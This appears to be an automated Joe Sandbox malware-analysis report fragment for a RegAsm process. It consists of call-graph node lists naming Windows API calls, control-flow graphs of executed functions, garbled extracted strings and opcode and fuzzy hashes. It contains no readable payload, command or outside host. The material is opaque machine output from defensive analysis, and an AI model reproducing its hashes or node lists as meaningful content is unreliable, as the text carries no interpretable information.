54758->54759 54760 5542e7a 54758->54760 54762 5542e58 CallWindowProcW 54759->54762 54763 5542e48 CallWindowProcW 54759->54763 54761 5542e40 54761->54731 54762->54761 54763->54761 54765 5542db4 54764->54765 54767 5542e58 CallWindowProcW 54765->54767 54768 5542e48 CallWindowProcW 54765->54768 54766 5542e40 54766->54731 54767->54766 54768->54766 54770 5540c07 54769->54770 54771 554435a CallWindowProcW 54770->54771 54772 5544309 54770->54772 54771->54772 54772->54731 54774 5542e69 54773->54774 54780 5544292 54773->54780 54774->54754 54777 5542e58 54776->54777 54778 5542e69 54777->54778 54779 5544292 CallWindowProcW 54777->54779 54778->54754 54779->54778 54781 5540bfc CallWindowProcW 54780->54781 54782 55442aa 54781->54782 54782->54774 54677 537ad38 54680 537ae30 54677->54680 54678 537ad47 54681 537ae41 54680->54681 54682 537ae64 54680->54682 54681->54682 54688 537b0b8 54681->54688 54692 537b0c8 54681->54692 54682->54678 54683 537ae5c 54683->54682 54684 537b068 GetModuleHandleW 54683->54684 54685 537b095 54684->54685 54685->54678 54689 537b0dc 54688->54689 54690 537b101 54689->54690 54696 537a870 54689->54696 54690->54683 54693 537b0dc 54692->54693 54694 537b101 54693->54694 54695 537a870 LoadLibraryExW 54693->54695 54694->54683 54695->54694 54698 537b2a8 LoadLibraryExW 54696->54698 54699 537b321 54698->54699 54699->54690 54700 537d0b8 54701 537d0fe 54700->54701 54705 537d298 54701->54705 54708 537d289 54701->54708 54702 537d1eb 54711 537c9a0 54705->54711 54709 537c9a0 DuplicateHandle 54708->54709 54710 537d2c6 54708->54710 54709->54710 54710->54702 54712 537d300 DuplicateHandle 54711->54712 54713 537d2c6 54712->54713 54713->54702 54783 5374668 54784 5374684 54783->54784 54785 5374696 54784->54785 54789 53747a0 54784->54789 54794 5373e10 54785->54794 54787 53746b5 54790 53747c5 54789->54790 54798 53748a1 54790->54798 54802 53748b0 54790->54802 54795 5373e1b 54794->54795 54810 5375c54 54795->54810 54797 5376ff0 54797->54787 54800 53748b0 54798->54800 54799 53749b4 54799->54799 54800->54799 54806 5374248 54800->54806 54804 53748d7 54802->54804 54803 53749b4 54804->54803 54805 5374248 CreateActCtxA 54804->54805 54805->54803 54807 5375940 CreateActCtxA 54806->54807 54809 5375a03 54807->54809 54809->54809 54811 5375c5f 54810->54811 54814 5375c64 54811->54814 54813 537709d 54813->54797 54815 5375c6f 54814->54815 54818 5375c94 54815->54818 54817 537717a 54817->54813 54819 5375c9f 54818->54819 54822 5375cc4 54819->54822 54821 537726d 54821->54817 54823 5375ccf 54822->54823 54824 5378691 54823->54824 54827 537cdf0 54823->54827 54832 537cde0 54823->54832 54824->54821 54828 537ce11 54827->54828 54829 537ce35 54828->54829 54837 537cfa0 54828->54837 54841 537cf90 54828->54841 54829->54824 54833 537ce11 54832->54833 54834 537ce35 54833->54834 54835 537cfa0 CreateWindowExW 54833->54835 54836 537cf90 CreateWindowExW 54833->54836 54834->54824 54835->54834 54836->54834 54838 537cfad 54837->54838 54839 537cfe7 54838->54839 54845 537c8d8 54838->54845 54839->54829 54842 537cfa0 54841->54842 54843 537c8d8 CreateWindowExW 54842->54843 54844 537cfe7 54842->54844 54843->54844 54844->54829 54846 537c8e3 54845->54846 54848 537d8f8 54846->54848 54849 537ca04 54846->54849 54848->54848 54850 537ca0f 54849->54850 54851 5375cc4 CreateWindowExW 54850->54851 54852 537d967 54851->54852 54856 537f6c8 54852->54856 54862 537f6e0 54852->54862 54853 537d9a1 54853->54848 54858 537f811 54856->54858 54859 537f711 54856->54859 54857 537f71d 54857->54853 54858->54853 54859->54857 54860 5540dc8 CreateWindowExW 54859->54860 54861 5540db8 CreateWindowExW 54859->54861 54860->54858 54861->54858 54864 537f711 54862->54864 54865 537f811 54862->54865 54863 537f71d 54863->54853 54864->54863 54866 5540dc8 CreateWindowExW 54864->54866 54867 5540db8 CreateWindowExW 54864->54867 54865->54853 54866->54865 54867->54865

                                                      Executed Functions

                                                      Function 0701CB80 Relevance: 6.6, Strings: 5, Instructions: 390COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 699 701cb80-701cbc1 702 701cbc3-701cbcb 699->702 703 701cbcd-701cbd1 699->703 704 701cbd6-701cbdb 702->704 703->704 705 701cbe4-701cbed 704->705 706 701cbdd-701cbe2 704->706 707 701cbf0-701cbf2 705->707 706->707 708 701cbf8-701cc11 call 701c9f8 707->708 709 701cf5e-701cf88 707->709 713 701cc13-701cc23 708->713 714 701cc5f-701cc66 708->714 734 701cf8f-701cfcf 709->734 717 701cef6-701cf13 713->717 718 701cc29-701cc41 713->718 715 701cc68 714->715 716 701cc6b-701cc7b 714->716 715->716 720 701cc8b-701cca8 716->720 721 701cc7d-701cc89 716->721 723 701cf1c-701cf25 717->723 722 701cc47-701cc4e 718->722 718->723 725 701ccac-701ccb8 720->725 721->725 726 701cc54-701cc5e 722->726 727 701cf2d-701cf57 722->727 723->727 728 701ccba-701ccbc 725->728 729 701ccbe 725->729 727->709 732 701ccc1-701ccc3 728->732 729->732 733 701ccc9-701ccde 732->733 732->734 736 701cce0-701ccec 733->736 737 701ccee-701cd0b 733->737 765 701cfd6-701d016 734->765 739 701cd0f-701cd1b 736->739 737->739 741 701cd24-701cd2d 739->741 742 701cd1d-701cd22 739->742 744 701cd30-701cd32 741->744 742->744 746 701cd38 744->746 747 701cdba-701cdbe 744->747 824 701cd3a call 701cb70 746->824 825 701cd3a call 701cb80 746->825 826 701cd3a call 701d078 746->826 749 701cdc0-701cdde 747->749 750 701cdf2-701ce0a call 701c8c0 747->750 749->750 762 701cde0-701cded call 701c9f8 749->762 769 701ce0f-701ce39 call 701c9f8 750->769 751 701cd40-701cd60 call 701c9f8 757 701cd70-701cd8d 751->757 758 701cd62-701cd6e 751->758 763 701cd91-701cd9d 757->763 758->763 762->713 767 701cda6-701cdaf 763->767 768 701cd9f-701cda4 763->768 792 701d01d-701d072 765->792 771 701cdb2-701cdb4 767->771 768->771 777 701ce49-701ce66 769->777 778 701ce3b-701ce47 769->778 771->747 771->765 779 701ce6a-701ce76 777->779 778->779 781 701ce78-701ce7a 779->781 782 701ce7c 779->782 783 701ce7f-701ce81 781->783 782->783 783->713 785 701ce87-701ce97 783->785 786 701cea7-701cec4 785->786 787 701ce99-701cea5 785->787 789 701cec8-701ced4 786->789 787->789 790 701ced6-701cedb 789->790 791 701cedd-701cee6 789->791 793 701cee9-701ceeb 790->793 791->793 801 701d074-701d077 792->801 802 701d07b-701d08f 792->802 793->792 794 701cef1 793->794 794->708 803 701d091-701d0a1 802->803 804 701d0b9-701d0c8 802->804 805 701d0a3-701d0b8 803->805 806 701d0c9-701d0d2 803->806 808 701d0d4-701d0d8 806->808 809 701d0db-701d0dd 806->809 810 701d0d9-701d0da 808->810 809->810 811 701d0df-701d0e1 809->811 810->809 812 701d0e3-701d0ff call 701c9f8 810->812 811->812 815 701d101-701d106 812->815 816 701d107-701d10e 812->816 817 701d110 816->817 818 701d113-701d120 816->818 817->818 820 701d122 818->820 821 701d12e-701d139 818->821 827 701d124 call 701d1c0 820->827 828 701d124 call 701d1d0 820->828 822 701d12a-701d12d 824->751 825->751 826->751 827->822 828->822
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Hq$Hq$Hq$Hq$Hq
                                                      • API String ID: 0-3799487529
                                                      • Opcode ID: cbbec72f09b613b8afe169625e88a57e3ccae70765d5cae7893ab0246e58cb5b
                                                      • Instruction ID: 5a54638dc0d85049e0a7c941ae0a982d08b8a14326c9188321f82b349200daf5
                                                      • Opcode Fuzzy Hash: cbbec72f09b613b8afe169625e88a57e3ccae70765d5cae7893ab0246e58cb5b
                                                      • Instruction Fuzzy Hash: C1F1B0B1A00356CBDB19CF74C4502AEFBF2BF85300F28866DD456AB241E734DA85CBA1
                                                      Function 07019460 Relevance: 4.8, Strings: 3, Instructions: 1088COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 829 7019460-701948b 830 7019492-701952e 829->830 831 701948d 829->831 834 7019580-70195bb 830->834 835 7019530-701957a 830->835 831->830 840 701a909-701a922 834->840 835->834 843 70195c0-701974f call 7013d70 840->843 844 701a928-701a94e 840->844 863 701a8c1-701a8db 843->863 847 701a950-701a95c 844->847 848 701a95d 844->848 847->848 849 701a95e 848->849 849->849 865 701a8e1-701a905 863->865 866 7019754-7019898 863->866 865->840 882 70198cb-7019912 866->882 883 701989a-70198c6 866->883 889 7019914-7019935 call 7014f00 882->889 890 7019937-7019946 882->890 886 7019959-7019b10 call 70150f0 883->886 913 7019b62-7019bdd 886->913 914 7019b12-7019b5c 886->914 895 701994c-7019958 889->895 890->895 895->886 921 7019c2f-7019ca9 913->921 922 7019bdf-7019c29 913->922 914->913 929 7019cfb-7019d4b 921->929 930 7019cab-7019cf5 921->930 922->921 935 7019d51-7019db4 929->935 936 701a1c4-701a24b 929->936 930->929 944 7019db6 935->944 945 7019dbb-7019f3a call 701914c call 70120a0 call 7018e70 call 70176fc call 701770c 935->945 948 701a2a9-701a2b4 936->948 949 701a24d-701a2a3 936->949 944->945 992 7019f40-7019f92 945->992 993 701a1a7-701a1c3 945->993 1078 701a2ba call 701aa68 948->1078 1079 701a2ba call 701aa78 948->1079 949->948 950 701a2c0-701a34d 965 701a3ab-701a3b6 950->965 966 701a34f-701a3a5 950->966 1074 701a3bc call 701aa68 965->1074 1075 701a3bc call 701aa78 965->1075 966->965 968 701a3c2-701a43a 980 701a498-701a4a3 968->980 981 701a43c-701a492 968->981 1072 701a4a9 call 701aa68 980->1072 1073 701a4a9 call 701aa78 980->1073 981->980 984 701a4af-701a4c1 988 701a4c9-701a51b 984->988 998 701a56d-701a578 988->998 999 701a51d-701a567 988->999 1002 7019fe4-701a05f 992->1002 1003 7019f94-7019fde 992->1003 993->936 1076 701a57e call 701aa68 998->1076 1077 701a57e call 701aa78 998->1077 999->998 1001 701a584-701a59c 1006 701a5a4-701a5ab 1001->1006 1017 701a0b1-701a12b 1002->1017 1018 701a061-701a0ab 1002->1018 1003->1002 1011 701a5b5-701a5c9 1006->1011 1013 701a6ff-701a8a8 1011->1013 1014 701a5cf-701a6fe 1011->1014 1069 701a8c0 1013->1069 1070 701a8aa-701a8bf 1013->1070 1014->1013 1033 701a17d-701a1a6 1017->1033 1034 701a12d-701a177 1017->1034 1018->1017 1033->993 1034->1033 1069->863 1070->1069 1072->984 1073->984 1074->968 1075->968 1076->1001 1077->1001 1078->950 1079->950
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 38$ku0l^${u0l^
                                                      • API String ID: 0-1510584215
                                                      • Opcode ID: 49e262c8b6f331695fa8a8291329f2bc8890cf0ccaa0e40c2c88ebe546e630d8
                                                      • Instruction ID: 71cc8a85951050611fad96a937f6e0ca3f9937405648cd4556332a5f4bebb817
                                                      • Opcode Fuzzy Hash: 49e262c8b6f331695fa8a8291329f2bc8890cf0ccaa0e40c2c88ebe546e630d8
                                                      • Instruction Fuzzy Hash: 39C292B4E012298FCB65DF25D898B9DBBB2FB49301F1086E9D409A7354DB31AE85CF50
                                                      Function 0701ABF0 Relevance: 2.9, Strings: 2, Instructions: 364COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1260 701abf0-701ac22 1261 701ac24 1260->1261 1262 701ac29-701acf5 1260->1262 1261->1262 1267 701acf7-701ad05 1262->1267 1268 701ad0a 1262->1268 1269 701b1b8-701b1c5 1267->1269 1331 701ad10 call 701b4d5 1268->1331 1332 701ad10 call 701b636 1268->1332 1333 701ad10 call 701b5a6 1268->1333 1334 701ad10 call 701b43d 1268->1334 1270 701ad16-701adc6 1278 701b147-701b171 1270->1278 1280 701b177-701b1b6 1278->1280 1281 701adcb-701afe1 1278->1281 1280->1269 1308 701afed-701b037 1281->1308 1311 701b039 1308->1311 1312 701b03f-701b041 1308->1312 1314 701b043 1311->1314 1315 701b03b-701b03d 1311->1315 1313 701b048-701b04f 1312->1313 1316 701b051-701b0c8 1313->1316 1317 701b0c9-701b0ef 1313->1317 1314->1313 1315->1312 1315->1314 1316->1317 1320 701b0f1-701b0fa 1317->1320 1321 701b0fc-701b108 1317->1321 1322 701b10e-701b12d 1320->1322 1321->1322 1326 701b143-701b144 1322->1326 1327 701b12f-701b142 1322->1327 1326->1278 1327->1326 1331->1270 1332->1270 1333->1270 1334->1270
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .$1
                                                      • API String ID: 0-1839485796
                                                      • Opcode ID: 950924367f842e524c1a4717f2a21311997ba1230d438fcd50d8ce08f8696be7
                                                      • Instruction ID: b6893a2756aea7e259fb66b9796fbf7253432e5d4578860623bbb13b20636cc4
                                                      • Opcode Fuzzy Hash: 950924367f842e524c1a4717f2a21311997ba1230d438fcd50d8ce08f8696be7
                                                      • Instruction Fuzzy Hash: 52F1CFB4E01328CFDB68DF65C854BADBBB2FF89301F5081A9D509A7254DB719A81CF11
                                                      Function 068F3F50 Relevance: 1.8, Strings: 1, Instructions: 524COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1464 68f3f50-68f3f84 1467 68f3f86-68f3f8f 1464->1467 1468 68f3f92-68f3fa5 1464->1468 1467->1468 1469 68f3fab-68f3fae 1468->1469 1470 68f4215-68f4219 1468->1470 1474 68f3fbd-68f3fc9 1469->1474 1475 68f3fb0-68f3fb5 1469->1475 1472 68f422e-68f4238 1470->1472 1473 68f421b-68f422b 1470->1473 1473->1472 1476 68f3fcf-68f3fe1 1474->1476 1477 68f4253-68f4299 1474->1477 1475->1474 1481 68f414d-68f415b 1476->1481 1482 68f3fe7-68f403a 1476->1482 1484 68f429b-68f42a5 1477->1484 1485 68f42a8-68f42d0 1477->1485 1490 68f4161-68f416f 1481->1490 1491 68f41e0-68f41e2 1481->1491 1514 68f403c-68f4048 call 68f3c88 1482->1514 1515 68f404a 1482->1515 1484->1485 1507 68f42d6-68f42ef 1485->1507 1508 68f4425-68f4443 1485->1508 1493 68f417e-68f418a 1490->1493 1494 68f4171-68f4176 1490->1494 1495 68f41e4-68f41ea 1491->1495 1496 68f41f0-68f41fc 1491->1496 1493->1477 1500 68f4190-68f41bf 1493->1500 1494->1493 1498 68f41ee 1495->1498 1499 68f41ec 1495->1499 1505 68f41fe-68f420f 1496->1505 1498->1496 1499->1496 1516 68f41c1-68f41ce 1500->1516 1517 68f41d0-68f41de 1500->1517 1505->1469 1505->1470 1525 68f4406-68f441f 1507->1525 1526 68f42f5-68f430b 1507->1526 1523 68f44ae-68f44b8 1508->1523 1524 68f4445-68f4467 1508->1524 1518 68f404c-68f405c 1514->1518 1515->1518 1516->1517 1517->1470 1533 68f405e-68f4075 1518->1533 1534 68f4077-68f4079 1518->1534 1543 68f44b9-68f450a 1524->1543 1544 68f4469-68f4485 1524->1544 1525->1507 1525->1508 1526->1525 1545 68f4311-68f435f 1526->1545 1533->1534 1535 68f407b-68f4089 1534->1535 1536 68f40c2-68f40c4 1534->1536 1535->1536 1550 68f408b-68f409d 1535->1550 1541 68f40c6-68f40d0 1536->1541 1542 68f40d2-68f40e2 1536->1542 1541->1542 1551 68f411b-68f4127 1541->1551 1553 68f410d-68f4110 1542->1553 1554 68f40e4-68f40f2 1542->1554 1580 68f450c-68f4528 1543->1580 1581 68f452a-68f4568 1543->1581 1557 68f44a9-68f44ac 1544->1557 1592 68f4389-68f43ad 1545->1592 1593 68f4361-68f4387 1545->1593 1563 68f409f-68f40a1 1550->1563 1564 68f40a3-68f40a7 1550->1564 1551->1505 1572 68f412d-68f4148 1551->1572 1613 68f4113 call 68f48a8 1553->1613 1614 68f4113 call 68f48b8 1553->1614 1569 68f4105-68f4108 1554->1569 1570 68f40f4-68f4103 1554->1570 1557->1523 1561 68f4493-68f4496 1557->1561 1561->1543 1567 68f4498-68f44a8 1561->1567 1568 68f40ad-68f40bc 1563->1568 1564->1568 1565 68f4119 1565->1551 1567->1557 1568->1536 1582 68f4239-68f424c 1568->1582 1569->1470 1570->1551 1572->1470 1580->1581 1582->1477 1602 68f43df-68f43f8 1592->1602 1603 68f43af-68f43c6 1592->1603 1593->1592 1606 68f43fa 1602->1606 1607 68f4403-68f4404 1602->1607 1610 68f43c8-68f43cb 1603->1610 1611 68f43d2-68f43dd 1603->1611 1606->1607 1607->1525 1610->1611 1611->1602 1611->1603 1613->1565 1614->1565
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $q
                                                      • API String ID: 0-1301096350
                                                      • Opcode ID: e4b43474a3e2143721ce4111a825d591117208c99f730d28a08eaaa62f34b33c
                                                      • Instruction ID: 27c6d14622f18859f293655e089638326472600dc2c4f74b13f1bab1664171bd
                                                      • Opcode Fuzzy Hash: e4b43474a3e2143721ce4111a825d591117208c99f730d28a08eaaa62f34b33c
                                                      • Instruction Fuzzy Hash: 29127134F102158FDB54DF69C484A6EBBF6FF88610B15816AEA06EB365DB31DC42CB90
                                                      Function 0701D8C8 Relevance: .8, Instructions: 814COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 56cb69df6587d8a44ba08337ed95b44fc762ddfaef6c0ac8df8174140963e12f
                                                      • Instruction ID: dd88dd46c0d5b59c7126479b2ab4fa4102b0960fb5b5c09c0a2c7030246de3a3
                                                      • Opcode Fuzzy Hash: 56cb69df6587d8a44ba08337ed95b44fc762ddfaef6c0ac8df8174140963e12f
                                                      • Instruction Fuzzy Hash: 488279F4604626CFDB74DF28D658BAA77F1AB48318F1082A8C8099B7A5EB34DC45CF51
                                                      Function 05546948 Relevance: .5, Instructions: 499COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1667540425.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_5540000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6fb70fdee903aca41be8196292631020149c63cda6b4955843397f15c191468c
                                                      • Instruction ID: 6d5d20580e16836eebbd7f32cc3720290b9fceb9497641d083952c8539a2fa46
                                                      • Opcode Fuzzy Hash: 6fb70fdee903aca41be8196292631020149c63cda6b4955843397f15c191468c
                                                      • Instruction Fuzzy Hash: 59221374905228CFDB69DF65C944BE9BBB2FF4A304F0090E9D509AB2A1DB359E84CF40
                                                      Function 068F67D8 Relevance: .4, Instructions: 413COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8a00ff79bd5c8c0ec4ca3e5331da69ca596f4a6b6349da5345a55d0311cae091
                                                      • Instruction ID: 75c86a2fec0c6a01aa78f01fda474d95342460612d5d7326b743c9a296b98b67
                                                      • Opcode Fuzzy Hash: 8a00ff79bd5c8c0ec4ca3e5331da69ca596f4a6b6349da5345a55d0311cae091
                                                      • Instruction Fuzzy Hash: 6DF1B031A002199FDB15DFA5D880B9EBBF2FF44310F148669E604EB265EB30ED46CB90
                                                      Function 068FA3D8 Relevance: .3, Instructions: 296COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 811c26c576660d05ce61e77afaa38d206320ac98b4122a9b58f3d95aa1e67bc8
                                                      • Instruction ID: dcbc6ae6c335a79badd5d751c37d6206affe1dfc9fe57e834060751224fe0497
                                                      • Opcode Fuzzy Hash: 811c26c576660d05ce61e77afaa38d206320ac98b4122a9b58f3d95aa1e67bc8
                                                      • Instruction Fuzzy Hash: 9AD1D274901318CFCB18EFB5D854A9DBBB2FF8A311F2085A9D50AAB254DB319986CF11
                                                      Function 068FA3E8 Relevance: .3, Instructions: 289COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4fa8b0572fee73d3fe759b593afbb0d4bb3dce30ea0d3fdd2a557aa7cfe6de6e
                                                      • Instruction ID: 2dda40a2a5542b9f0b22645cc61919390c22879d78c275fd6106410fcf1b4fad
                                                      • Opcode Fuzzy Hash: 4fa8b0572fee73d3fe759b593afbb0d4bb3dce30ea0d3fdd2a557aa7cfe6de6e
                                                      • Instruction Fuzzy Hash: B5D1C274E01318CFCB18EFB5D854A9DBBB2FF8A311F2085A9D50AAB254DB319985CF11
                                                      Function 05547C20 Relevance: .3, Instructions: 279COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1667540425.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_5540000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2600fb56c0cc459426d6948a43e0529bdf4ff87940ea726b0ac0ccaf4663884a
                                                      • Instruction ID: 7e6c79df46fa5eb88de806093c9423e3bcb95c274039297b2891b5926428466b
                                                      • Opcode Fuzzy Hash: 2600fb56c0cc459426d6948a43e0529bdf4ff87940ea726b0ac0ccaf4663884a
                                                      • Instruction Fuzzy Hash: 10C17174E042198FDB24DFA6D890B9EFBB2FF89300F14D1A9D409A7255DB30A986CF51
                                                      Function 05547C10 Relevance: .1, Instructions: 126COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1667540425.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_5540000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3bfe0774c95064230be3e26723e8f4c922b4f8e723ea2ecac195f011f8db8352
                                                      • Instruction ID: 351a1128ecf598f53500400bbfe620322401395a506f389cf2e770703bff17c7
                                                      • Opcode Fuzzy Hash: 3bfe0774c95064230be3e26723e8f4c922b4f8e723ea2ecac195f011f8db8352
                                                      • Instruction Fuzzy Hash: CE51B874E002188BEB18CFA6D845B9EFBB3BFC8304F14C1A9C81DAB259DB3159469F50
                                                      Function 068D0D80 Relevance: 20.6, Strings: 16, Instructions: 614COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 263 68d0d80-68d0dcb 268 68d0efd-68d0f10 263->268 269 68d0dd1-68d0dd3 263->269 273 68d1006-68d1011 268->273 274 68d0f16-68d0f25 268->274 270 68d0dd6-68d0de5 269->270 275 68d0e9d-68d0ea1 270->275 276 68d0deb-68d0e1d 270->276 277 68d1019-68d1022 273->277 283 68d0f2b-68d0f51 274->283 284 68d0fd1-68d0fd5 274->284 278 68d0eb0 275->278 279 68d0ea3-68d0eae 275->279 310 68d0e1f-68d0e24 276->310 311 68d0e26-68d0e2d 276->311 281 68d0eb5-68d0eb8 278->281 279->281 281->277 288 68d0ebe-68d0ec2 281->288 312 68d0f5a-68d0f61 283->312 313 68d0f53-68d0f58 283->313 286 68d0fe4 284->286 287 68d0fd7-68d0fe2 284->287 289 68d0fe6-68d0fe8 286->289 287->289 290 68d0ec4-68d0ecf 288->290 291 68d0ed1 288->291 296 68d1039-68d1068 289->296 297 68d0fea-68d0ff4 289->297 294 68d0ed3-68d0ed5 290->294 291->294 299 68d0edb-68d0ee5 294->299 300 68d1025-68d1032 294->300 296->273 324 68d106a-68d10b5 296->324 305 68d0ff7-68d1000 297->305 314 68d0ee8-68d0ef2 299->314 300->296 305->273 305->274 316 68d0e91-68d0e9b 310->316 317 68d0e2f-68d0e50 311->317 318 68d0e52-68d0e76 311->318 320 68d0f86-68d0faa 312->320 321 68d0f63-68d0f84 312->321 319 68d0fc5-68d0fcf 313->319 314->270 322 68d0ef8 314->322 316->314 317->316 338 68d0e8e 318->338 339 68d0e78-68d0e7e 318->339 319->305 336 68d0fac-68d0fb2 320->336 337 68d0fc2 320->337 321->319 322->277 347 68d1189-68d119c 324->347 348 68d10bb-68d10bd 324->348 340 68d0fb4 336->340 341 68d0fb6-68d0fb8 336->341 337->319 338->316 343 68d0e80 339->343 344 68d0e82-68d0e84 339->344 340->337 341->337 343->338 344->338 352 68d1234-68d123f 347->352 353 68d11a2-68d11b1 347->353 349 68d10c0-68d10cf 348->349 354 68d1129-68d112d 349->354 355 68d10d1-68d10dd 349->355 357 68d1247-68d1249 352->357 361 68d11ff-68d1203 353->361 362 68d11b3-68d11dc 353->362 358 68d113c 354->358 359 68d112f-68d113a 354->359 369 68d10e7-68d10fe 355->369 363 68d124b-68d1250 357->363 360 68d1141-68d1144 358->360 359->360 360->357 365 68d114a-68d114e 360->365 367 68d1205-68d1210 361->367 368 68d1212 361->368 387 68d11de-68d11e4 362->387 388 68d11f4-68d11fd 362->388 370 68d115d 365->370 371 68d1150-68d115b 365->371 372 68d1214-68d1216 367->372 368->372 378 68d1104-68d1106 369->378 377 68d115f-68d1161 370->377 371->377 375 68d1218-68d1222 372->375 376 68d1267-68d1290 372->376 391 68d1225-68d122e 375->391 376->363 402 68d1292-68d12af 376->402 381 68d1167-68d1171 377->381 382 68d1253-68d1260 377->382 384 68d111e-68d1127 378->384 385 68d1108-68d110e 378->385 398 68d1174-68d117e 381->398 382->376 384->398 389 68d1110 385->389 390 68d1112-68d1114 385->390 392 68d11e8-68d11ea 387->392 393 68d11e6 387->393 388->391 389->384 390->384 391->352 391->353 392->388 393->388 398->349 400 68d1184 398->400 400->357 404 68d12c7-68d12e9 402->404 405 68d12b1-68d12b7 402->405 410 68d12ec-68d12f0 404->410 406 68d12b9 405->406 407 68d12bb-68d12bd 405->407 406->404 407->404 411 68d12f9-68d12fe 410->411 412 68d12f2-68d12f7 410->412 413 68d1304-68d1307 411->413 412->413 414 68d130d-68d1322 413->414 415 68d14f8-68d1500 413->415 414->410 417 68d1324 414->417 418 68d1498 417->418 419 68d132b-68d1350 417->419 420 68d13e0-68d1405 417->420 421 68d14a2-68d14b9 418->421 432 68d1356-68d135a 419->432 433 68d1352-68d1354 419->433 430 68d140b-68d140f 420->430 431 68d1407-68d1409 420->431 425 68d14bf-68d14f3 421->425 425->410 435 68d1411-68d142e 430->435 436 68d1430-68d1453 430->436 434 68d146d-68d1493 431->434 438 68d135c-68d1379 432->438 439 68d137b-68d139e 432->439 437 68d13b8-68d13db 433->437 434->410 435->434 454 68d146b 436->454 455 68d1455-68d145b 436->455 437->410 438->437 456 68d13b6 439->456 457 68d13a0-68d13a6 439->457 454->434 460 68d145d 455->460 461 68d145f-68d1461 455->461 456->437 458 68d13a8 457->458 459 68d13aa-68d13ac 457->459 458->456 459->456 460->454 461->454
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668903718.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68d0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q
                                                      • API String ID: 0-2144323406
